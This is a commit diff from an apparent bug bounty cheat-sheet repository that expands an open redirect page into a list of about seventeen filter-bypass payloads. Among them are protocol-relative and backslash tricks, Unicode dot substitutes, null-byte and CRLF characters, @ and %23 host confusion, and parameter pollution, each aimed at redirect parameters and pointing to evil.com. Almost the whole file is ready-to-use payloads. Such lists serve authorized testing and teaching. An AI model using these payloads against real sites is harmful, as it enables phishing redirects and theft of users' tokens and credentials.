STRLCPY/AllAboutBugBounty

Adding a lot open redirect tips
MD15 committed 3 years ago

db67aa46

1 parent 5428e251

Total 1 files

■ ■ ■ ■ ■ ■

Open Redirect.md

1		-	## Filter Bypass
	1	+	## Open Redirect
2	2
3		-	1. Using a whitelisted domain or keyword
	3	+	1. Try change the domain
4	4		```
5		-	target.com.evil.com
	5	+	/?redir=evil.com
6	6		```
7	7
8		-	2. Using "//" to bypass "http" blacklisted keyword
	8	+	2. Using a whitelisted domain or keyword
9	9		```
10		-	//evil.com
	10	+	/?redir=target.com.evil.com
11	11		```
12	12
13		-	3. Using "https:" to bypass "//" blacklisted keyword
	13	+	3. Using `//` to bypass `http` blacklisted keyword
14	14		```
15		-	https:evil.com
	15	+	/?redir=//evil.com
16	16		```
17	17
18		-	4. Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
	18	+	4. Using `https:` to bypass `//` blacklisted keyword
19	19		```
20		-	\/\/evil.com/
21		-	/\/evil.com/
	20	+	/?redir=https:evil.com
22	21		```
23	22
24		-	5. Using "%E3%80%82" to bypass "." blacklisted character
	23	+	5. Using `\\` to bypass `//` blacklisted keyword
	24	+	```
	25	+	/?redir=\\evil.com
	26	+	```
	27	+
	28	+	6. Using `\/\/` to bypass `//` blacklisted keyword
	29	+	```
	30	+	/?redir=\/\/evil.com/
	31	+	/?redir=/\/evil.com/
	32	+	```
	33	+
	34	+	7. Using `%E3%80%82` to bypass `.` blacklisted character
25	35		```
26	36		/?redir=evil。com
27	37		/?redir=evil%E3%80%82com
28	38		```
29	39
30		-	6. Using null byte "%00" to bypass blacklist filter
	40	+	8. Using null byte `%00` to bypass blacklist filter
31	41		```
32		-	//evil%00.com
	42	+	/?redir=//evil%00.com
33	43		```
34	44
35		-	7. Using parameter pollution
	45	+	9. Using parameter pollution
36	46		```
37		-	?next=target.com&next=evil.com
	47	+	/?next=target.com&next=evil.com
38	48		```
39	49
40		-	8. Using "@" character, browser will redirect to anything after the "@"
	50	+	10. Using `@` or `%40` character, browser will redirect to anything after the `@`
41	51		```
42		-	[email protected]
43		-	target.com%40evil.com
	52	+	/?redir=[email protected]
	53	+	/?redir=target.com%40evil.com
44	54		```
45	55
46		-	9. Creating folder as their domain
	56	+	11. Creating folder as their domain
47	57		```
48	58		http://www.yoursite.com/http://www.theirsite.com/
49	59		http://www.yoursite.com/folder/www.folder.com
50	60		```
51	61
52		-	10. Using "?" characted, browser will translate it to "/?"
	62	+	12. Using `?` characted, browser will translate it to `/?`
53	63		```
54		-	http://www.yoursite.com?http://www.theirsite.com/
55		-	http://www.yoursite.com?folder/www.folder.com
	64	+	/?redir=target.com?evil.com
56	65		```
57	66
58		-	11. Host/Split Unicode Normalization
	67	+	13. Bypass the filter if it only checks for domain name using `%23`
	68	+	```
	69	+	/?redir=target.com%23evil.com
	70	+	```
	71	+
	72	+	14. Host/Split Unicode Normalization
59	73		```
60	74		https://evil.c℀.example.com
61	75		```
62	76
63		-	12. Using parsing
	77	+	15. Using parsing
64	78		```
65	79		http://ⓔⓥⓘⓛ.ⓒⓞⓜ
66	80		```
	81	+
	82	+	16. Using `°` symbol to bypass
	83	+	```
	84	+	/?redir=target.com/°evil.com
	85	+	```
	86	+
	87	+	17. Bypass the filter if it only allows yoou to control the path using a nullbyte `%0d` or `%0a`
	88	+	```
	89	+	/?redir=/%0d/evil.com
	90	+	```

Adding a lot open redirect tips